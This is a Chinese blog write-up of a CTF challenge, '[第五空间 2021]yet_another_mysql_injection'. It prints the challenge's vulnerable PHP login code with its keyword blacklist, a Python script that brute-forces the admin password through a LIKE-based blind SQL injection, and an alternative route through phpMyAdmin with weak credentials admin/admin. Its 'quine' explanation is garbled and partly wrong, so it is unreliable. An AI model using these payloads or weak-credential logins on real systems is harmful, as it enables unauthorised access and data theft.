[第五空间 2021]yet_another_mysql_injection wp

最新推荐文章于 2024-06-29 00:28:48 发布
最新推荐文章于 2024-06-29 00:28:48 发布
阅读量572 收藏 2
点赞数 1
分类专栏: web刷题 文章标签: mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Leaf_initial/article/details/131601121
版权
文章介绍了如何利用PHP代码中的SQL注入漏洞进行攻击,特别是当checkSql函数过滤了大部分关键词但未阻止LIKE操作时,通过构造特殊查询语句绕过防御。提供了一段Python脚本示例进行密码爆破,并提到了通过扫描发现/phpmyadmin路径,尝试弱口令登录以获取flag的方法。
摘要由CSDN通过智能技术生成

[第五空间 2021]yet_another_mysql_injection

f12发现hint/?sourceimage-20230707160316566

访问之后直接给出源码

<?php
include_once("lib.php");
function alertMes($mes,$url){
    die("<script>alert('{$mes}');location.href='{$url}';</script>");
}

function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
        die($FLAG);
    } else {
    alertMes("wrong password",'index.php');
  }
}

if(isset($_GET['source'])){
  show_source(__FILE__);
  die;
}
?>

通过这段代码可以知道,我们需要传入usernamepassword两个值,然后在经过password检验的时候会到达checkSql函数,而且这个函数过滤掉了大部分常用的sql注入关键词

关键是

$sql="SELECT password FROM users WHERE username='admin' and password='$password';";
$user_result=mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);

代码解释:

  1. 使用变量 s q l 存储一个 S Q L 查询语句,该查询语句从名为 " u s e r s " 的数据库表中选择名为 " p a s s w o r d " 的列,其中 " u s e r n a m e " 列的值等于 " a d m i n " ,并且 " p a s s w o r d " 列的值等于变量 sql存储一个SQL查询语句,该查询语句从名为"users"的数据库表中选择名为"password"的列,其中"username"列的值等于"admin",并且"password"列的值等于变量 sql存储一个SQL查询语句,该查询语句从名为"users"的数据库表中选择名为"password"的列,其中"username"列的值等于"admin",并且"password"列的值等于变量password的值。
  2. 使用mysqli_query函数执行SQL查询,并将结果存储在变量$user_result中。
  3. 使用mysqli_fetch_array函数从查询结果中获取一行记录,并将其存储在变量 r o w 中。这个 row中。这个 row中。这个row数组包含了从数据库中获取到的"password"列的值。

所以我们的目的就是找到admin对应的password

虽然checkSql已经过滤掉了大部分的关键词,但是like /**/ ' %都没有被过滤,可以编写脚本爆破密码 ,我这里直接找了一个师傅的脚本

import requests,time
alp = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~"
def get_pass():
    url = "http://1.14.71.254:28610/index.php"
    flag = ""
    while True:
        for i in alp:
            data={"username":"admin","password":f"1'or/**/password/**/like/**/'{flag+i}%'#"}
            resp = requests.post(url=url,data=data)
            time.sleep(0.1)
            if "something wrong" not in resp.text:
                flag+=i
                print(flag)
                break
            elif "~" in i:
                return
get_pass()

爆破出来密码

image-20230707164252807

登录后得到flag

补充:

本题考察的是quine方法

quine方法

Quine 方法是一种用于绕过基于白名单(whitelist)的 SQL 注入防御措施的技术方法。白名单是一种更安全的防御措施,它会检查用户输入中是否包含一些特定的字符或字符串,并只允许这些字符或字符串被用于查询。这样可以防止一些恶意的操作和语句被执行。

Quine 方法是通过构造一些特殊的查询语句来绕过这种白名单防御措施。例如,在执行查询时,攻击者可以构造以下语句来绕过白名单:

SELECT column_name FROM information_schema.columns WHERE table_name='users' AND column_name LIKE 0x2575716572795f646574656374

在这个语句中,攻击者使用了 HEX 编码来表示 LIKE 运算符右侧的字符串,这个字符串实际上是 “unique_detect” 的 HEX 编码。由于白名单只允许使用特定的字符或字符串,而不允许使用特定的运算符或操作,因此攻击者可以使用这种方法来绕过白名单的限制,从而执行恶意的操作。

具体可看 NSS日刷-[第五空间 2021]yet_another_mysql_injection-Qunie

脚本出处:[第五空间 2021]yet_another_mysql_injection

方法二:

用dirsearch扫一下,可以看到有/phpmyadmin路由

image-20230707170232848

直接访问,弱口令试一试就过了,账号admin密码admin

image-20230707170520008

从这里可以看到admin对应的password,然后返回登录就可以得到flag

image-20230707170639473

Leafzzz__
关注
专栏目录
test333333333.rar_Not Yet_Not tested yet_ofdm
09-24
【标题】"test333333333.rar_Not Yet_Not tested yet_ofdm" 暗示了这是一个关于OFDM(正交频分复用)技术的未测试文件集合,可能包含了一些代码或者文档。 【描述】"not tested yet but dont sownload. just tested...
CTFHUB 2021-第五空间 yet_another_mysql_injection
Jay17的博客
07-05 1144
CTFHUB 2021-第五空间 yet_another_mysql_injection
第五空间yet_another_mysql_injection
最新发布
2301_80113257的博客
06-29 334
这时用quine注入。核心思想就是让sql语句执行的结果等于sql语句本身,来绕过这个验证。注出来fc3e129bd11f8e7ecf9fc816:eg1b5c4,但是密码显示错误。<>(大于小于号) -> least(),greatest()这题可以用上面链接中的脚本生成这个payload。根据提示访问source得到后端代码。结果和password是一样的!猜测password。先看最终的password。执行内层REPLACE。空格 -> /**/password变成。
第五空间web复现
unexpectedthing的博客
09-27 817
@[]
[第五空间 2021]yet_another_mysql_injection
bossDDYY的博客
11-10 1690
打开题目 查看源码 发现可用信息。,试试登录,返回flag。
[第五空间-2021]yet_another_mysql_injection
liaochonxiang的博客
04-24 317
password输入必须和数据库中查询到的一样。username必须为admin。
2021第五空间WEB
~airrudder~
02-24 3284
2021第五空间web部分复现
yet_another_demo_repo
04-19
"yet_another_demo_repo"看起来像是一个GitHub仓库的克隆或归档,通常这样的命名模式表明它是一个示例项目或者用于演示特定功能的代码库。虽然没有具体的标签提供额外的信息,我们可以从一般的角度来探讨一个典型的...
SDL_dx5video.rar_Not Yet
09-14
标题 "SDL_dx5video.rar_Not Yet" 暗示了这是一个与DirectX 5相关的视频处理库,可能用于游戏开发或者图形应用。在描述中提到的 "Not yet in the mingw32 cross-compile headers" 提示我们这个库尚未包含在mingw32...
信息安全_数据安全_Yet_Another_IoT_Hack.pdf
08-23
在“Yet Another IoT Hack”这个话题中,我们将深入探讨物联网设备的安全挑战、威胁模型、常见的攻击手段以及应对策略。 物联网设备的安全失败历史已经得到了广泛记录,每年都有更多的设备接入网络,而这些设备的...
thj.rar_33s,co/7ThJ_Not Yet_THJ-456
09-23
标题 "thj.rar_33s,co/7ThJ_Not Yet_THJ-456" 提供的信息可能是指一个名为 "thj" 的压缩文件,该文件与一个域名或路径 "33s,co/7ThJ" 相关,并且带有标记 "Not Yet THJ-456",这可能表示这是一个未完成或正在开发...
解:[第五空间 2021]yet_another_mysql_injection--TLS_预备队任务(1)
river_mouth_man的博客
03-11 229
sql盲注,like模糊匹配
[第五空间 2021]web 复现wp
snowlyzz的博客
09-13 660
[第五空间 2021] wp
[第五空间 2021] Web题解
weixin_51804748的博客
01-18 5209
WebFTP 题目是一个网站管理工具WebFTP2011,上网搜索WebFTP,可以在github中找到这个项目,从README中获取初始用户名和密码 使用说明 1、初始账号 超级管理员 admin 密码 admin888 成功登陆后寻找服务器的网站目录,随便翻看有无可疑文件,最后在phpinfo中找到flag EasyCleanup <?php if(!isset($_GET['mode'])){ highlight_file(__file__); }else if($_GE
Quine-[第五空间 2021]yet_another_mysql_injection
qq_74426248的博客
07-24 447
文章为[第五空间 2021]yet_another_mysql_injection的详细解析,欢迎一起讨论交流!!
2021 第五空间 ctf wp
qq_45603443的博客
09-23 3489
2021 第五空间 ctf Misc签到alpha10BabyMiCryptoECCReverseuniappPwnbountyhunterCrazyVMWebEasyCleanuppklovecloudPNG图⽚转换器WebFTPyet_another_mysql_injection Misc 签到 flag{welcometo5space} alpha10 分离得到两个图⽚,⼀个jpg⼀个png, 两张图⼀样,想到可能是盲⽔印, https://github.com/chishaxie/BlindWa
2021第五空间webakwp
fmyyy1的博客
09-18 1220
前言 挺傻逼的,5道web题全是静态靶机,三道rce题,一直有人搅屎,不知道主办方咋想的。 附一张图 不过也算是ak了web 总体感觉还不错 webftp 这题就要说到搅屎的问题了,我直接扫路径扫到1.txt看到flag,大概是哪位大师傅放的 赛后跟别的师傅聊了一下,预期解是github上能下载源码然后看就行。 EasyCleanup 源码逻辑很简单,给了phpinfo和任意文件包含 这里的 session.upload_progress.cleanup 是off的,不会自动清除session文件 那
[Injection]对MYSQL 5.0服务器以上版本注入
Gabriel的专栏
09-15 797
by ZaraByteHow to do a SQL Injection for MYSQL Server 5.0+1. Find a vulnerable add a ‘ at the end of the site example: news.php?id=1 add a ‘ at the end of the 1 and see if you get a syntax error
yet_another_mysql_injection
06-06
yet_another_mysql_injection是一种MySQL注入攻击的形式。MySQL注入攻击是指攻击者通过在Web应用程序中注入恶意的SQL语句,从而获取或篡改数据库中的数据。这种攻击方式常常利用Web应用程序中的漏洞,例如未经过滤的用户输入,来执行恶意的SQL语句。为了防止MySQL注入攻击,开发人员应该对用户输入进行严格的过滤和验证,以确保输入的数据是安全的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值